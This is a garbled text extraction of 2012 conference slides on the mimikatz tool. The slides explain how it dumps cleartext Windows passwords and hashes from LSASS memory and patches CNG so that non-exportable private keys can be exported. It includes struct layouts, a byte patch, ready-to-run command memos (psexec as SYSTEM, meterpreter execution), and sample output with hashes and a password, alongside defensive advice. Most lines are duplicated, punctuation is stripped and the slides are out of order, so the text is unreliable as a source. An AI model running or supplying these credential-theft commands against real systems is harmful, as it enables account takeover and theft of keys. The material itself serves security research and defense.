07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
